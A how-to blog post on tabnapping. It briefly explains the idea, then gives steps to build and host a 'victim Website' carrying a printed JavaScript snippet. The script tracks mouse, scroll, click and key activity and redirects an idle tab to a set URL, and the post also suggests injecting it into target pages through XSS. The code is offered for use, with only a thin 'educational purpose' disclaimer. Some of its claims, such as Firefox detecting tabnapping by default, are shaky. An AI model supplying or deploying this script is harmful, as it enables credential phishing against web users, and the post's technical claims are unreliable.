Introduction to Tabnapping | blog.hackshade.com

When Phishing became outdated, there evolved many other techniques for hacking into Internet Credentials. Here is the one called as Tabnapping.

Tabnapping is the term coined by Mr.Aza Raskin, in 2010 when he was a security researcher & design expert in Mozilla Firefox. Well, he invented a small Javascript code which can redirect the visitors page to another page automatically by detecting their browsing behaviours. Thus, this script does not affect the existing page in any manner regarding to the design or look, It just redirects one page to another after tracking the user behaviour on that respective tab in their web browser.

Hence, The code tracks if the user is still using the tab by detecting current browser tabs page scrolling & click activity. So, when the any suspicious tab remains open but idle for a defined time with this code, it automatically redirects. This threat can occur to the businessman & other important person who like to browser in multiple tabs on their work.

This activity is another loophole for some hackers and attackers who can use XSS(Cross Site Scripting) or any such technique to just place a chunk of script in the target webpage and lead to work on the hackers demand. However, the code does not work with firefox because not only mozilla firefox web browser detects the phishing pages & tabnapping script by default, but also awares the victim user on the tab about it.

It do works with Google Chrome.

Tabnapping
Tabnapping Demonstration | blog.hackshade.com

 

Finally coming to the application, just follow the steps below and test your cyber-security skills…!

Requirements:-

  1. Computer / Laptop.
  2. Basic Javascript Knowledge.
  3. Website Hosting.

 

Steps:-

  1. Open Notepad++
  2. Design or Code your victim Website.
  3. Insert this Javascript code in your webpage under the <body></body> tag.
  4. Edit this code a little. (Redirection Website URL & Timing of Redirection)
  5. Host the website on your server.

 

JAVASCRIPT CODE:-

<script type=”text/javascript”> 
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
function initRedirect(){
  if (typeof document.body.scrollTop != “undefined”){ //IE,NS7,Moz
    xScroll = document.body.scrollLeft;
    yScroll = document.body.scrollTop;
    clearInterval(timerPoll); //stop polling scroll move
    clearInterval(timerRedirect); //stop timed redirect
    timerPoll = setInterval(“pollActivity()”,1); //poll scrolling
    timerRedirect = setInterval(“location.href=’http://www.gmail.com'”,10000); //set timed redirect
  }
  else if (typeof window.pageYOffset != “undefined”){ //other browsers that support pageYOffset/pageXOffset instead
    xScroll = window.pageXOffset;
    yScroll = window.pageYOffset;
    clearInterval(timerPoll); //stop polling scroll move
    clearInterval(timerRedirect); //stop timed redirect
    timerPoll = setInterval(“pollActivity()”,1); //poll scrolling
    timerRedirect = setInterval(“location.href=’http://www.gmail.com'”,10000); //set timed redirect
  }
  //else do nothing
}
function pollActivity(){
  if ((typeof document.body.scrollTop != “undefined” && (xScroll!=document.body.scrollLeft || yScroll!=document.body.scrollTop)) //IE/NS7/Moz
   ||
   (typeof window.pageYOffset != “undefined” && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) { //other browsers
      initRedirect(); //reset polling scroll position
  }
}
document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>

 

For more visually detailed demonstration, Watch our youtube video below:-

NOTE:-
THIS DEMONSTRATION IS ONLY FOR EDUCATIONAL PURPOSE, HACKSHADE BLOG IS NOT
LIABLE TO ANY ILLEGAL ACTIVITY PERFORMED BY VIEWERS.
“We promote curiosity but not with malicious intentions”

 

SUBSCRIBE OUR YOUTUBE CHANNEL :-
 
Like, Follow & Share | Keep supporting blog.hackshade.com

 

Leave a Reply

Your email address will not be published. Required fields are marked *